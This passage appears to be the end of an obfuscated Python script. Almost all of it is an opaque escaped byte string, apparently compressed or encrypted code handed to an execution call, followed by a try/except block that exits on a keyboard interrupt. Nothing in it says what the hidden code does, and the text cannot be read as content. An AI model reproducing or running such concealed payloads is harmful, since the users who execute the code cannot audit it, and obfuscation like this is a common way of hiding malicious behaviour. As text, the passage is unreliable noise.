\xd7\xe5\xb27\xa7\xd8\xce\x10\xd9\xbf\xcfI\xf6\x0e\xd7Pm\xaf\xee\x00\xcf\xc6F\x80\x9b\x8eFP\xd4\x88\xb9\xf8\x1c\xa07\x1atA]Z.lv\x06\xae\xeb\xfb\xa3\x8e9\x9a2\xac[\xf1D\x1a\xf5\x07_\xbc7\xcfV*\x97|\x85\x9bC\xa9g\xf4\xd3\xe2\x130z8\x83\xb8\xac\xa0\xbf\xc6\x1f\x1e8\x8d1\xd1-\x17\x9e\n\x8e\x18s\xcf\x96\xd5\xeeuy\xff\x1a\xe3\xcf\xbbL\xc60\x8c)m\x7fr\xdc\xd6\xa6\xb36\xe6\xb3\x8c\xfe\x08\xfb;\xae?\xe3\x0b.\xba.xy\xa3)s\xdf\xe5v\xf0\x93an\xf0En\xc90\xaa.Yz\x84\xab\xf1}Dc\x8c\x19\x95\x13=\xf5N\x9e\x8a?\xe6?w\xc5C$\x81\xbb0\x078\x08j\xceG\xd8$\x99\xb4m\x8d\xa65\xb1\xcd\xf7\xaah\xa9\x96Dz\xc0w\x1c\xfe&\x9fPi}sN\xe4\xb9a\x18i\x1e\xfcXF\xe8\xdaZ\xb9\x81\xda@M\xa2>\xb4K\x1ek\xd0\x8b{\x91\x98i\xca\x97\xa9\xb8\xe9\xa4D\x8dOC\x14B\x8c\x9do\x05\xecl\xc5}j\xe8\x9f;\x12\x07\xa4\xbfcv2\xd3\xfdk\xf0\x1c.2P{k\xd0\x07z\\\xe3\xc0:\xd7\xdc\xcc\x7fD\x81\xea:Pe\x18a\xac\x11"\xfa\xc6\xb1\x84\xa6\xfd\x18\x82\xe3\xe2\xa4\x08\xfd\xad\x1a\x8d[s\xd3\xa60\xa1\xdc\x01\\\xf2Fa\xa9x\x89\x15\x9c\xc8A9\xd5<\x14\xbc\x07\xact\xea\xde\x7fypc\x05\xb33\xd9\x9d\xae\x81\x1c\xe4\x9d:\r\x9c\x82\xb0L\xb5\xfd\xc4\x1a_,w\x03-\x86\xc3\xbf\x19#D\xc4L\x81\xac\x82\x03\xffB\xd7V\x96\xc0M\xd0\x7f\xb5\x1e\xb7\xb7|\xd4\x1d\xaa\x1e\xd7\xc1\xd9\xa6\x17\xd8\xed\xa6\x03\x10%\xf5\xdeN#b\x81p\xf6\xa3U\xda\x1e \xca\x92\xaft\xf3\xd7.e\xf3\xb1\xd2\x94\xd0MF@Y\xe7\xb9\xa2\xb6\xd6\x06<\x8d\xf0I\xab\xdd\x86\xacx(wd\xff\xf5\x83N\xb6\x1e\xac\xf8\x91*\xdd\xfek\x0e\xf2\xf2Up\xc8\xa0nb\xff\xb6)+\x0biQo\xab\xd8:S\x16\x90\x96\xed\xc7\xbf\x9a\xc5\xe9\xe8\xb0\xe5\x16\xc5\x10\x8a\x07\x83\xc1f\x15\xfa:\x06(\x9c\x17 \xc1{=\xe6\xea\xc4b\xd6\xca\x7f\xabD<c\x11\x08\xb1Q\xc8UQ\x07\\C=CI\x8a<`\xf7\x14\xa5\x93WM\xa9\xcd\xfb\xc0\x8e\xd8M\xd5\xbc\x02{\n\x06\xb2\xe4\xdf\xb9v\x7fI\x8d<\x9d\xf7\x93E\x94\x10\xee\x87A\x8e\x99\xea\x0b\xab\x9f\x80Vs`:\xb3\x0f)\xdd\\G\xfa\x1e\x90!1L[\x97\xa0/\xd9\x1d\xab\x94-\xf8\xb7\xd1b\x1ck\xc0\xfb\xf6\xe6Z\xd6\xb9 \xb8\xaa\xbc\xcc\xf3~\x1bFR>\xe2\x86\xb6i$]mu5\x86\xcc\x89\x11\xc5(#\x1d\x85\x9e\x06\x0c|\xe4wo\x8b]\xdd\xee\x1b\xd2\x0b\x83F*\xfc1\xb5\x82\xa3^\xaa\xc5\xfe\xad\xf0\x9a\x0fZN\xe1\xeb\x1a3y\x93\xb7\x9b\xc4Ln\xa96\x9b8\xad(7\xc6\xda\xbc\xb2\x99\x8d\x990\xa7\xaf\xb7\xb2\x9c\xb5J\xdaep\x80D\x04v\x12\x14\x7f\xff\x10\xb6{\xf2\x91\x93\x84\x9bkYnR\xe3\xd2\xdcC|\xee\xf9\x94({\xf8\xc4\x9f\xb5h\xbb\xd0\xaa\x18H-N\xa8p\xa3\xa3\xb0\x93\x01\x1f<\x81\t\x8b\xb6L\xbdPl\xf4%u\xa1\xde\x17\xb6\xae\xb5\xd9Uj\xef\xfa\x94)EA\x87E7\n\x87\xcb2\xbdhL+\xb1r\x15\x15\xeb\x1f\xdfF\xe67\xe7xDp"h\x1fox \xed\xf40\xc5%\x10:\x1bN\xdb\x92\xf0YQ\xc6a\xec\x1a\xbe\xfcw\xa0\xee\xb9\x08\x06T\x00\xe5\x03\xcc\x90\xe4X\xad\x05<\xc2\xab\xe7\xd4\x00\t\'\xc6\'&+h,W\xc6}*\x03k\x0e\x7f\xaf\xa0s\xc5\xfb\xb2\xf4\xadbd\x1c\xd5\x82`\xc7e\xdao\xa6\xdb\x9a&\n\xce\x01\xc4\xa6\x16\xb6M>?\x03\xab\xea\xe7Qe_9\xc1_\xea\xf9\xc4l\xe1\xe9\x1c\x9e^\x13bJ\'\xd0\x02\xe4\xd2\x90\x85 \x9d\x80\x00\x88\xd0F\x89\xdc\xc3/\xfa\xe2Fde\xc3\x8e-\x7f\x0b\x12\xcb\xa1\xde\xe3?L\xc9\x83\xff\xb5\xa1p\xe8\xabkhpO\x1d\xc5w\x1d\xaf\xf9~\xa3\x9eR\x8c0/<\xc7\x95\x90\x94\x92\xc2\xd0\x8b\xd9\x7f-l\x90[T\xdb\xec\n\x83\xfaK\x06\xbc[G\xb9\x99\x9e\x1eI5:\xe5\xdb\x12\xca\xf9\xfbq=\x05\xf1\xf4\t\xec\xe9\xbe\xbc`@\xfdn\xccK\xe7{u6\x8d\xb0{\xe47\xc52>\x161H\xdc\xe5\xaf\xc7l;M;?\xc5\xa8\xdd\xc2i\x9ft7\x0f\x0b\xbc\xe5\xc9\x04\xef\xa1\x98P\xf8\x0c^\x86\xa8\xd0\x17\xdf\x17\xfc\x9cW\xd6\xa0\xfc\xd6c)\xa5\x0e\xc3\xf3\xc6|\x1a)\xe9X\xc3N\xf4\xbc+\xe1\x12\xd4d\xc6\xb0{Q\x0e]\x99eC_\xdb\x01\xe4\xf7\x08\xc0\xe5M\xea.y$\x96*\xcf\x00\xe3_\xcb\r\x14\xbe\xeep\xa7Q\x01l\x95\xec\x0f\xfei|a\xdb\xa6X\x14^\xf7\xc2\xbe\x10\xff\xb2\xbb\xa7\xd5\x858\xf4\xb3x\xc4\xaa#<\x9b\xd1\x8a\xec\x98X\xa7\x12\xf2\xae\xe4#\xc1\xb8\x03mT\xb3\x88\xd5EQ\xb5p\xbdK\xf8\xdd\x9bC\x8c\xdf\x16\xb7i\xd5\xb0\xdaayk\x8a\xae\x16\x81\n\xb5\x8ds\xc9\xc7\xaa\xa6"\xf0\x1a\xe9\xcb\xde\xe1\x05\xef7\x11\x82\xbc\xd65\xa7\xa0\x0bL\xb2M);\xaa\xfe\xa1\xc9\r\xf1\xbb\xe3\xb9\xe4?\xdf;\xc74f\xe3=x\x14\xe7ku\xc7\xfb\x1b\xb5\x02\xc4\xc8\xa6\x11TA>\xdf{\x07X%\x9a\xcc\xb7\x17\xa6\x0eu\xfdTq\rN\xdarh\x07e3\xde\xad\xaf\xf2N\xb2\x93\xa8J\xaf3\xf3D\xf6H,\x17)\xb1\x96v\x91bB\xc8\x9c\x0e\xb3\x12\xd1\x94\xcdN[\xf7\xe9FZ/e \x13p\xd8\x03\xc4\x11\xb9\x91q\xe3\xc4\x8f\xa3\xbc\x0f\x97\xb3\xc1\xc3E\xac\xa2\xce\xcd\xb3\x11z\x13\xc3\x0b\xdcm\xdb\x86\x93\x81\xaa\xe2\xa1Xt\xc1kH\x94G:\x8c\xcd\xeedb\x04\xbb1}\xb2\x97HT\xafxZ\x08T\xce^.y\xca\xed\x91>\x19Z\'\xe9\xdd\xa6,\x1b\xb1\x9d\xbe\xf8DO\x11\xc4\x90v+|\xf0+\xab\xf2\xc3nT\xe1\xad\x07*\x02b\x1e5bc\xa2\xded7\x1abz\xda\x9f\xe9\xac\x95;X\xcd\xaa\xe3\x87\xb5\xd1\xebG[\xb97Y\x95\x06\xe4\xbd\x1b*\xd0E\xf3\x9dm\xe3\x08\xf6\x0f\xdeO\x06\x7f\x8b\xa6\xeb\x9ef\xaa-\xeeMDq\xac\xe2&I5\\u\xa5o5L\x1c\xb4ka\x87\xd9 \xc7\xa8\xeb\xbb\xfag;\xe1\xd2\xea"+\xbb\n\xd7~\xdd\x9ft\x9b\xfbT%\xd3\x0c\xbc\x87\xab\x97\x80\xafw\x95\xc5zy\x90\x9f\t\x96\xb0\xc1\xd8\x12\x93,\xe7\xaa\xcb(\xff\xd2y}:\x96\r\x82\r\xb2\xbf\x19;\x94\xcba\xeaS\'\x9a\x98\xcc\xe7\x83B\xc9\xa9\xaa=\xb9h\xde\x8a1y_\x91\xea\xbb\xe6gu_\x9en9\xf7h5\xec+BT~\x0b\'\xea"0]\x03\x18\xcb\x00\x90\xe7\xdf\xe7A\xf0J\xc5b\x0c\xd5\x06lOQ\xc6\xec\xf9\x06\x1d>\xdc\x00\xbf:l}2\xea0\x14\xba\xc2$$\x1d\xe5\x8f\x9d\xec\xe7\xd1i\xe8\xda\xe3\x887\xce\xf1\x1f\xd1\x1d\xa5\xe2\x1fV"2m4\xfe\x89n\x14ZU\x93{c\'\x8fC\x0b\x14X&\x8c\xf6\x0b\xab\xd2\xa9\x1c\xb2\xe0g\x82\xf7\x97\x8aw\x151\xa4\xff\x89YF\xe7\x92\xcb\xf9C\x0c\xd3\x94\xc0\xdcX\xa7m\x0cE\xe7K\x92\x88\xac\'\x1e\xf5\xc1\x8d\x16xtAG\xaa\xa2\x19\xfcQaH\xa8x\xe9\xd5\xf8\x0c7e\x95%\xf1\xac\xbd[[ v\xc8N\x14\xc5\xc6\x05\xea+\xfc+\xca\xc5\x9ejq\xd1\x81t\x81\x00\xd5D0\x89\x07q\xa4\xa6\x8c\'\xf4s\x9f\xb6\x0c\xb8`\xc6\x03\x82p4\xe5tnbd\x8d\xef\xf7\xf1\xc5\xd43\x82\xd2\xad\x81}\x14\xaa\x02Y\xa0\xae\x98(\x99"A\xa4.\x1asS\xf5\xf0\xe0\xb4\x98\xfd\\\x01{\x9e\xb7 N^\x0f7g\x9ad\xdd\xf9\xfe\xf7\x8a<;\xe3X\xbb)x)\x1am\xd1r\xae\xfd\x8e\x9f\xd4\xd9}\xd4\xef\xa8\xb4\'\x18\xb2\x00R\xc3\x17\xc6\x85S1\x0eEw@\x01\x15G\xe2\xdfZ\xad\xc8\xf0\x82P\x0f8\x07\x92\xca\xd8\x87r\xfby GI \x01O\xa6:A[Ck?\x14\x1c(0\x96\xd5Q5[\xe8\xaaG)\x89C\xcbX\xd81\x06\xf5\xb6*$`\xc8/ix\xa4k\xc2\xbd\x9f\xfc\x05U\x90\xabN\x87;i\xc0\xa6\x80\x19\xf7\x06KcK\x9c\x07\xf4\xbb\xfc\x9e\x84\xcdO\xa2C\xedZd\xd5\xc8\x9f\x1d\xb9\xef\x97Z\x16\x15\x1bs\x16\xad\xf9/\xc2p\xa6%a\xed\xc4a3b\x85N0\xe8\x8b\xc5\x82\xf524H\x0f\xe7\xe1\x14\x90\xc4\xa8}\xac &k\xee\x19\xac]\xfd\x8c\x08\x12:\xf8K2Q\xa4\xae\x7f\xd7\xecJ\xc4\xa5z\xf4#\xab\xe0\x8ew.\x0b\xf1ipm\x13(\xa7\xc7\xb7\xb4Y\xce\xf0\x8f\xad\x1f\x83jr,pf\xd4?\x82=?\x8b\xd7V\xf9\xb7qMI\xcfc\xc7\xcc\x82\xa7\x90Z\xa0\xd3]\x90\xb8\xcdRa\x01,\xaelx\x0ez\xa7#/\x19\x94\rQ\x12\xb4\xb0A\xc0\xf7\x99\xabD\x1c\xa2\x0e\xea\x92sD\x9a\x1ck!\x19\x1fl\x96g\xbb\xd8t\x158\x08m\x99\xf5V\xf1A*2 \x8e\x8f\xd6IS\xa1\x0f\x96\xca\xe6\xbb\xa3\xb2\xd9\xdaY;\xd8\xefP\xe2tkM\xbeO\xa4\xa5Is\x94\xee\xde\xf6\xf6T\x15\'\x02_\xf6\xf7\xba\xcc\x19\x01\x82\xa5\xab\r\xc3J\xdb\xfd\xbf<(:\xc9q\xe3UPAH.5\xed\x7fH++6\xa3\xa0\x04T\x06\xda\xbb\xc6\xcf\xcc\xd9K\x8a\xd7\x9a\x9e\xed\x95\xe8\xda\xde\x07*\xbc\x8d\'\xb8~\x8a%\xa0m\x86\xf7\x18\xf4\x1fh\xa5J\x1fXJ\x9e?\xaf\xea*|\xe1|\xf4\xfbz\xba\x97\xd4\xe9\x05n3{\x0bsk(Z\xce\xc0\x01\xb6\xce\xf7\tvta\xb9\x1ft\x16X\xdeh%\xf7Q\xf8\x1a\x02\xdc%B\x92\xfc\x1eV\xbb\xbd\xc11\xb6\xbae0\xb9\xb66\xe7\xc18\xa4\xfa\x97k\xc5v\x14]\'F\x11\xb1\x83|X\xd9\xfa\x81\x1b!\xd0\xdd\xdd\'\xa6\xd9\x8bE\xf0\xe6\x9e\xa0\x06\x06\x03\r\x15\xfdW\x08\xf0\xd7\nb\x1c\x8e\xb6:P\xd7\r2}ss\xea[)\xec\xd6\xbb\xa9cd-\x1c\xc32\xab\x98\\\xbf\xd6\x90\xd1{\x11\xbc\xa4\x82\xa2)\x98\xb9p.\x9b\x07\x91G`\xa0\x85>\x83\xcc\xaczr\x0f\xcb\x8c\xa7\xc7\xa5z)\xb1\xb0\x82\x16\x96\x88x\x8d_\xf6*\xb7"_\xd6\xc7\xdb.F0-p\x04\xa1D7\xd4\x1a\x1a!)\xe4\x1c%;\x19\x10\xe7!\xc1"\x12)v\xc7\xef\x92\xf5\x17\xf4\x9b\xca\xe7\x98a\xe1\xd3\xae\x8a_E\\ o}\xc0C\xcfs\x0c[)\x85\xdd>\x9dw\x931\xf6\xb0\x02\x0b\xb6\xe1\x1a=\xc9\xacN\xce\xd8d\xb0.\xae\x90\xa8\x9a\xe9\x10\xf9\xff\x85\xd0\xa9Dq\xec\xe9\x8a\xf6\x17\x93\xfdl\xb9\x0c\xa6\xe7\xa7\xaf\xf1@\xa6\xd8\xa8\x87%\x1a\xaa\xff\x18l\x1f\xce\x1d\xd8<\xe5:\xfe\x08\'\xcb\xc5\x02\xbd\xbe\x92\xcc{7\x8c\xfd\xc0`\xfcL\xee\xfb04\xa3\xd1\xf8=\x10<\x18\x9cg\x0f\x89i\x83x\xa7?;\x1e:&\xa1\xc3\xe2\xd8\xef\x13\x1d\x10\xab\x15\x16\x16/K\x94\x8c\xd3\xb0%\x16>\xcac\xea;\x04\xe2\xc9\xf4\xe5\xe7\xa7\x99\xeeW\x10\xa8u\xed[zS8\x0e\x9f\xb3f.\xe5@\xe3\x8d]I\xc1\xac\x8c\x92\x12\x05!\x8c\xc2f\xc5\xb0M=T\xd4\x810\xfbWF5\x1c\\\x06\x1e\xe2\xce#B\xd8\xbcI\xde\xa6\x01\xcbeZ\xbd\x8c\x92\x0c\x8ej\xd0A\x00T\x9c\x8d\x1a\x0b\xc5\xf8,\x06\xd9\xeb\xb7\x1e\xda$\x17\xa5\x1c\xbe\xf7sS-\x10\xadGpq\xf7N\xa4@]\xde\xbc\xbd\x93qn\xe0\xa3"\x0f(c\xe7+\xb4\n\xdb\xf6\xfe\xe4\x8dQ\x87\xdd\x08a\xde\xed\xb3^\x95\xf5\xf7k\xbb\xfb\x9d\xa09\x8e\xbe\xff\x95yX)\x1e=)\xe5\x8d\xd6\xea\x15\x0c\xbf\xa5$\xce~\xba3\t\xae!\xe6\xf4"\x99\xe4\xdd\xf62\xb6><\xcd\xca\n\xb89\xab\xeb\xcf\r\xb9"]\xe9\xf4\xe0\x10?Gu\xcf\x03\xfc\x8fF\xea\x13g\xf3K\x94\xdd\xafb\xe6\xf02\xbf\xb7\xf3\x06\x17\xb1FW\x13\xec\x98\xb8\xb0\xa4\xe4\xd3\x07\xbb\xe7\x10\x858\xa4\x18\xbb\xf0@\xb8\\\xc4\xed\xd5N\xa1\xf7\xfe\x17h\xd6\xc8\xae\xf3\x8b\x82<\xd2\xfc\x9c\x0cP\xbc\x14\x0f\x90u\xec\x9bbv\xab\xde\xa2\xd8<\xde\x04\xf0Z\x9ddp\xd5\xa2o\xba\x03-SI\x90\x0f\xcb\xe4\x19M\x00\x1c\xc0\x03\xc7\xb3\xca\xf5\xb5 \x06,\x9a\xb1x\xec\xc4\xfc\xb4\xcf\xce&6`\x01\x87e\x10\x0cE:4c\x0b\xac\xf3\xfc+\xc2\xdf\xa2\xa3\x1cW+\xdaw\xb5\x9fq\xa7@\x15\x03\x01\xd0\x13\xafaq\x1d#\x95H\xa1\xac\xc8\x05<v9\xbe\xe7\rc\xa8\xd1\xab\xe3*YR\xd6@\x12,\xf8\xb2\x8b88\xfa\x93^\xc36\x99\xa3y\x86\xe8\x05h\x8e\xcf\x8ef\xa2\xa2\xfb]5\xcf\xe1\xfeOR?\x85\x0f&id`|\xe0\x8e\x8b\x10\x95e\xa7\xdb\rH[\xf9\x18\x0e\xd16\x14\x12}\xa12\xd7L\x11\xf7\x07\x08\x1d\xd3\xf3\xefU"\xa0\xf4\xecy\x99\x90\xc3\xe5p\x85!\xb0K(\xe1\x98z\x10\x9cJ\x9e~\xed\xa6\xf9q\xaf\x91y\x969\x83\xf1\xf4` FS\xe3vQ\x94\x8eM\xd7\xe5zV8fLc\x93\xf1\xd0\xa5\xcc1bZ`o- \xaf$\xfd>c\xe7\xe0/|P\x0bdR\xc7\x1dx\xebF\xa1\xc6\xba\xbf\x99u7~>\x91\xbc\xb2\xe6\x9cR\x95\xd5\x05\xe3\xc7g\xff\x13\x1f\x9f\x16>\x9c\x87.Z\xee\xce\xaau.|\xe4\xfdP\xb5\xcf\xfdl\xf7\x16\xd0\x9d\xca\x03Nv\xe1SqyJ\xcd\xfb\xf9\x95]\x8e\x10{\xe6o\x8bLs\x99\xc9[\x90\x10V\xda\xe7\x8e2\x1e|\xf5hT\x069\x99\xd8Ri#3\x0f\x8b\xc3d\xc8\x9eX\xb9\x0c\x0cp\xc0\x06?Or\xc6\xcc\x81\x08\x1b\xad\xd8\x04\xdc\xd7\x17\xec<J<\x01a\x08\xad\xdf\xa6S\xeasw\xb7 {\xd7u\x17\xa3\xac0\x93\xb5\xe3>y\x86\xf5sjG\xab\xb7\xa9W\x96a\xb6{\xb8\xfa)_\xae.y\xae"\xb3u\x85\xa3\x97\x10\xbf6\xd5Gv\xf7;&H\xdb\x93\x83q\xf2\x19\xc4\x96\xcc\x9c\x04Jdw\xeah\xed|\xc3\xa6\x8d4O\x9b\xda]\x89\xf3\x03\xbb\xc6\xa4\xd1&9L\x11tQ\x83\x82\xd5\xc4\xba\xdc$\xf6^\x80\xc3\xb7\x89y\xbe\x9e\x91\x13B\xe4\xa2\x17\x96\xe1\xad\xf6,0\xe3e\x1c\x0f~!\xe9Dw\xfc\xc0M\x9e\xfas\x81\xc3\xdf\xec\x08\xc1\x8d\xb6^&P\xc4Z^\x86\xca\x8a\xf4\xd2H7\xba`OPa}A=\xba\xda\xa1\xfe\x1f\xf7S\x1f\x01\xa8\x03\x85{\x99\x95\x9f\x98\xbbv\xb4\xb4\xd8NR3\x11\xbcc\x92\x1f\xa4\xba\xf8\xf9\xcdQ\xac\x9c\x8f`Y\xa4\x82Jd\xc2\x99DE\x83\xef+\xe7\xc4\x92\xb98Z\xdb\xb8\x80V\x08\x14\xa7\xce\x190\xca\xedO\xef\xbb\xea\x9c\x19\x8d\xf6\xdd\x00\xb6o\x95\x98+\xe8\xfb\xce.Aq(\xc1r\x86\xf3q\xad\x94Iy\x9f\xfa(#\xe7\x97-\x1f\x92\x10p1N\xa9\xd3CJF\xff-\xfe\xd4M\x82\x88\x05\t\x82\xec\xf6A\x05v\xfc\xf1\xc3\xe8\xb5\x13I\xb9\xb2e\x03\xda\xfd\xc7\x8c\x99J\xcb\x92Z:\x13\x9d\xf7\x8c\x99\xae9 \xfd5\x80\xc7Cv\xf5XG\xea\x93*\xbb\xbbtg\xe7;Y\xb1\x89\x82\xc5&\xff\xd9\xbdC\xd6\xc4\xf6`\xc7\xa9\xdfLi+\x89)\x98\xe8\'\x16\xf6\x94\x1c\x06\n\xfcF\xa6\xf3vwX\xf3\xb1}\x9d\x97\x0c\x02\xdeo_O~\xb7\xc3X\xe1`^$\x8d\x910L\xb5T|\x80\x08u\x9a\xc8v\x07\xcc\xef\xb2\xaa\x97N\xed\xc06b\xc3\x92\xbb\xc9\xe9\xb54\xfb\xd9-\xd1&\x03\x01U\xef\xa46\x7f\xfe\xe7b&<\xa1]\xebN\xec\xaa\x19\r\xaf\xe9\x12\xcf%c\xd8oE\xee*\x03bi?\xec\xd7\x1al\x90%\xfc\xef\x1c\x87L\xbc?\xd4M\x83\x8a\x0e\x8d\xaem\x1b\x08\x0f\xc6\xc3\x03w\x14\xabn\xab\x80x\xc3\t\r\xd1U\xacq\xbd\xef-}\xbd\x9a\xd2\x9aI\xf3\x00\x80\x98\x7f^\xa1f`\xde\rO\xcd\x86o\xe4Hmo-\xc4\x12\xfe\xc2@\xe6\xaa\x0c\x03j\x93\x05\\\xd2\xe5\xdc\x9c\xa0t\x8b\xda\x00\xa1b\xc6o\xb6\xec\xaf\x1d\x04h{"\xda"=\xfe^.G\xba]\xfb\xd9\xd8\xe0\xb9\xa84z\xc8`\xfe\x8f\xb6\x9d\xfci\xb2\x82\x13\xc3\xc0\xe8\x15(\x0b\x15\xb6\x04K\na\x9d\xd3\xdcz\x0eaw0\x8c\xa3D\x82A\xb7\x1c\xec\x14\xbf\xd1\x0c2\xe50\xcc\xf7\x12.\xa1\x8c\xeb\xe2Y\xc9\xa7\x03\xb0\xbcv/\xcb\xeeu\x03Qr\x9b\xd0\x89\xd2\xe7\xf0\x15o"6m\x9c\xb6\xd0\xb1Y@\xd8\xda\xdb\x10\n\x07&\x19\x03Y\xb9Z\xed\xc4P\x12\xc0\xe9vY\xd5\x80\x1b\xf7\x12H\xe3\xc5\xfc\xb3F\x19\x93\x15\xc5\xb6\x89\xb5V\xfcM\x84\x07\xb1\xe0\xb1S\xb8\'\x17+\x16\xcfW\x11\xf1\xa2\xa89\xfcc\x80\x03\x8aM\xdfG\xddOS\xf2\x91\xb9\x19\xb2\xc9\x01\x19\xf2\x93\xf0\xde\xa1B\x85^\xad_\xc2\xea\x02\x9a\x01\xbfNw\x19P\x9eD\xed\x9b\xf2i\x14\xdc\x1c\x06\xd9\xd7v\'\x19osN=\xb7s/5a\x04%\xdf\x9c\x17m\xb68!S\xed\xb6\xd5o\xfcM\xffD\xf9\xdf\x8f*\xff\x18\xe7\n\xb1L\xca\x08\x00\xc8\x98\xcc\xa0\x11\x00\x90\xa2i%\xdd8l\xf9\x01\xfa_\x11\\[\x87\x06f\x03\xca\xde\xd8\xc5\xd5\xca\xd8n\x03\xdc\xce\xc7\xdex\x03\xdc\xd2\xc7\xdai\x03\xcc\xc4\x87u\x03\xda\xc4\xda\xc1\xd8\xd5\xd4\xdaz\x03\xdc\xc7\xce\xdad\x03\xdc\xdc\xcb\xdct\x03\xc2\xce\xd1\xd8\xccu\x03\xd6\xcc\xdc\xd4\xd1\xde\xc9\xc5\xdc\xd5\xb5\x12\xe0\x02\xfb\x9fv\xff+\xef\xb0J\xde\x0c\x92\xee\xae\xa6\xc6n\xe6\x1b\xd0\xfc\xf6\x8ef\xeev\xe6\x82 \xff}\x18\xfb\xefL)\x80\xd2\xfb>\xaf\xf2\x7f\xbc\xfd\xdf\x9f\xfc\xff\x00\xed\x19\x1bL')))
except KeyboardInterrupt:
	exit()
